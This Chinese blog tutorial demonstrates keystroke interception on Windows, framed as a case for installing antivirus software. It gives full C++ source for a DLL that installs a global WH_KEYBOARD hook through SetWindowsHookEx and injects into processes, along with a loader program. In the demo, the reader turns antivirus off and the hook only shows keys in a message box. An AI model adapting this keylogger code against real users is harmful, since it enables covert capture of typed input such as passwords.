一：背景

1.讲故事

前几天群里很热闹，看了下在争论两个问题：

• 电脑里要不要装杀毒软件 ?

• 应该装什么杀毒软件 ?

不管杀毒软件流氓不流氓，在如今病毒肆虐的当下互联网，装一个还是能帮我们拦截很多意想不到的东西，为了眼见为实，这一篇我们就聊一个窃听 键盘事件 的恶意代码。

2. 思路

实现思路非常简单，一旦某个程序触发了键盘事件，就给目标程序注入一个 dll，在这个 dll 中来实现窃听的业务逻辑，简而言之就是在 OS -> WPF 的消息传递链路上安装一个 消息钩子。

二：键盘窃听

1. 新建 WPF 程序

要截获 WPF 的键盘事件，首先得新建一个 WpfApp1.exe 程序，放一个文本框，等一会我们要窃听它，截图如下：

2. 注入进程的 MyHook.dll

新建一个 C++ 的动态链接库项目，取名 MyHook.dll，这个 dll 是用于动态注入到 WpfApp1 中做窃听的，参考代码如下：

#include "pch.h"#include "stdio.h"
#include "windows.h"
#include <string>using namespace std;HINSTANCE myhookModule = NULL;
HHOOK g_hHook = NULL;BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:myhookModule = hModule;  break;}return TRUE;
}LRESULT CALLBACK MyKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {char szPath[MAX_PATH] = {};if (nCode == 0 && !(lParam & 0x80000000)) {//1. 提取程序名GetModuleFileNameA(NULL, szPath, MAX_PATH);char* p = strrchr(szPath, '\\');//2. 监控 WpfApp1.exeif (!_stricmp(p + 1, "WpfApp1.exe")) {wstring content = L"您的按键：" + to_wstring(toascii(wParam));MessageBox(NULL, content.c_str(), L"友情提示", 1);}}return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}extern "C" {__declspec(dllexport) void HookStart() {g_hHook = SetWindowsHookEx(WH_KEYBOARD, MyKeyboardProc, myhookModule, 0);}__declspec(dllexport) void HookStop() {if (g_hHook) {UnhookWindowsHookEx(g_hHook);g_hHook = NULL;}}
}

代码逻辑很简单，大概分三块：

1. SetWindowsHookEx

在 Win32Api 中提供了一个叫 SetWindowsHookEx 函数用来设置消息钩子，从方法参数中可以看到，可以指定对某一类消息进行监听，并且还能触发相应的回调函数，比如这里的 MyKeyboardProc，消息类型参考如下：

#define WH_MIN              (-1)
#define WH_MSGFILTER        (-1)
#define WH_JOURNALRECORD    0
#define WH_JOURNALPLAYBACK  1
#define WH_KEYBOARD         2
#define WH_GETMESSAGE       3
#define WH_CALLWNDPROC      4
#define WH_CBT              5
#define WH_SYSMSGFILTER     6
#define WH_MOUSE            7
...

最后通过 C 的方式导出 HookStart 和 HookStop 函数，方便宿主提前启动。

1. MyKeyboardProc

这个是具体的回调函数，逻辑很简单，就是对 WpfApp1.exe 程序的键盘事件的触发提前处理，其他程序触发的事件我们不需要处理，最后通过 MessageBox 的方式将输入的键值以 ascii 码的方式打印出来。

1. DllMain

这个是 DLL 的入口函数，和 exe 的 Main 的作用是一致的，我们在dll被加载的时候，记录下 module 的实例，方便操作系统将这个 module 注入到其他进程中。

3. MyHook 的宿主 MyHookMain.exe

接下来新建一个名为 MyHookMain.exe 的 C++ 程序，目的就是调用 HookStart 函数，参考如下代码：

#include <iostream>
#include "stdio.h"
#include "conio.h"
#include "Windows.h"typedef void(*MY_HOOKSTART)();int main()
{HMODULE hDll = LoadLibrary(L"MyHook.dll");MY_HOOKSTART hookStart = (MY_HOOKSTART)GetProcAddress(hDll, "HookStart");hookStart();printf("hookStart 已成功启动！");getchar();FreeLibrary(hDll);
}

接下来把程序跑起来，如果正常就启用了消息挂钩，截图如下：

4. 演示

所有工作准备好之后，接下来把杀毒软件关掉，对，就是杀毒软件，然后打开 WpfApp1.exe 程序，随便输入一个字符，马上就能看到该字符的 ascii 码，截图如下：

既然有弹框，肯定是走了 MyKeyboardProc 逻辑，那怎么验证呢？可以用 Process Explorer 工具看一下 WpfApp1.exe 中有没有注入 MyHook.dll 就可以了。

太棒了，真的注入进去了，如果你开启杀毒软件，或者某些卫士，你会发现 SetWindowsHookEx 函数不起作用了， MyHook.dll 也不会注入到进程中。

三：总结

这个例子很好的告诉了我们，恶意程序无处不在，防不胜防，如果你的系统真的放在裸机下跑，总会有中招的时候，所以杀毒该装的还得装。